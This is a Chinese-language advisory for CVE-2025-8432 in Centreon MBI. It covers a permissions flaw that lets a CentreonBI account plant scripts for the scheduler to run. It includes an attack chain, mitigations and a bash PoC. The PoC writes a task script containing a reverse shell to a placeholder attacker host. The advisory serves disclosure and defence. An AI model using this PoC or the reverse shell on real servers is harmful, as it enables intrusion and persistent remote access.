Centreon MBI 默认权限配置错误导致脚本注入漏洞 (CVE-2025-8432)

漏洞信息

漏洞编号

CVE-2025-8432

漏洞类型

默认权限配置错误

CVSS评分

8.4 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Centreon Infra Monitoring (MBI modules)

漏洞概述

CVE-2025-8432是Centreon Infra Monitoring（基础设施监控）MBI（Monitoring Business Intelligence）模块中的一个高危安全漏洞。该漏洞源于安装或配置过程中的默认权限设置不当，允许具有CentreonBI用户账户权限的攻击者在MBI服务器上嵌入并执行恶意脚本。由于MBI模块在Centreon监控系统中承担着数据分析和报表生成的关键角色，其服务器通常具有较高的系统权限，因此该漏洞可能导致严重的权限提升后果。攻击者利用此漏洞可以绕过当前的权限限制，在MBI服务器上执行任意脚本代码，进而可能获取对监控系统的完全控制权，窃取敏感监控数据或横向移动到其他关联系统。此漏洞影响Centreon多个长期支持版本，需要管理员及时更新到安全版本并审查权限配置。

技术细节

该漏洞的根本原因在于Centreon MBI模块在安装过程中未正确设置文件和目录的访问权限。具体表现为CentreonBI用户账户被赋予了过高的文件系统权限，使其能够在MBI服务器的特定目录中创建、修改或替换脚本文件。由于MBI模块的报表生成和任务调度功能依赖于这些脚本的自动执行，攻击者可以通过在合法脚本中嵌入恶意代码来实现持久化攻击。当MBI服务重新加载或执行定时任务时，嵌入的恶意代码将以CentreonBI用户权限运行，从而实现代码执行。由于CentreonBI账户通常被配置为能够访问数据库和系统资源，攻击者可以利用脚本执行获取敏感信息、修改监控配置或建立后门。攻击者首先需要获取CentreonBI账户的访问权限（可通过凭证泄露或其他漏洞实现），然后利用默认权限配置错误写入恶意脚本到MBI的任务目录中，等待服务执行触发攻击。

攻击链分析

STEP 1

步骤1

攻击者获取CentreonBI用户账户凭证（通过社会工程学、凭证泄露或其他漏洞）

STEP 2

步骤2

攻击者使用CentreonBI账户登录MBI服务器，检查默认权限配置

STEP 3

步骤3

利用MBI模块任务目录的过度宽松权限，向目录中写入恶意脚本

STEP 4

步骤4

等待MBI调度器执行定时任务或手动触发脚本执行

STEP 5

步骤5

恶意脚本以CentreonBI用户权限执行，实现代码执行和权限提升

STEP 6

步骤6

攻击者利用提升的权限访问敏感数据、修改监控配置或横向移动到其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-8432 PoC - Centreon MBI Script Injection via Incorrect Default Permissions
# This PoC demonstrates the vulnerability in CentreonBI user account

TARGET_HOST="<target-centreon-mbi-server>"
CENTREONBI_USER="centreonbi"
MALICIOUS_SCRIPT="/opt/centreon-bi/var/lib/centreonBI/tasks/malicious_task.sh"

# Step 1: Verify CentreonBI user has write permissions to MBI task directories
echo "[*] Checking write permissions on MBI task directories..."
ssh $CENTREONBI_USER@$TARGET_HOST "ls -la /opt/centreon-bi/var/lib/centreonBI/tasks/"

# Step 2: Create malicious script in MBI tasks directory
echo "[*] Injecting malicious script..."
MALICIOUS_CODE='#!/bin/bash
echo "[+] Malicious code executed with CentreonBI privileges" >> /tmp/pwned.log
# Add reverse shell or other malicious operations here
/bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1'

ssh $CENTREONBI_USER@$TARGET_HOST "cat > $MALICIOUS_SCRIPT << 'EOF'
$MALICIOUS_CODE
EOF
chmod +x $MALICIOUS_SCRIPT"

# Step 3: Wait for MBI scheduler to execute the script
echo "[*] Waiting for MBI scheduler execution (may take several minutes)..."
echo "[*] Check /tmp/pwned.log on target for successful exploitation"

# Note: This PoC requires valid CentreonBI credentials and assumes default vulnerable permissions

影响范围

Centreon Infra Monitoring 24.10.0 - 24.10.5

Centreon Infra Monitoring 24.04.0 - 24.04.8

Centreon Infra Monitoring 23.10.0 - 23.10.14

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：首先，审查并修改/opt/centreon-bi/var/lib/centreonBI/目录及其子目录的权限，移除CentreonBI用户对任务目录的写权限；其次，限制CentreonBI账户的SSH访问，仅允许从授权的Centreon Central服务器进行连接；第三，启用MBI模块的安全审计日志，监控所有脚本创建和修改行为；第四，在MBI服务器上部署主机入侵检测系统（HIDS）监控关键目录的文件变化；最后，考虑在MBI服务器前端部署应用层防火墙，限制对管理接口的未授权访问。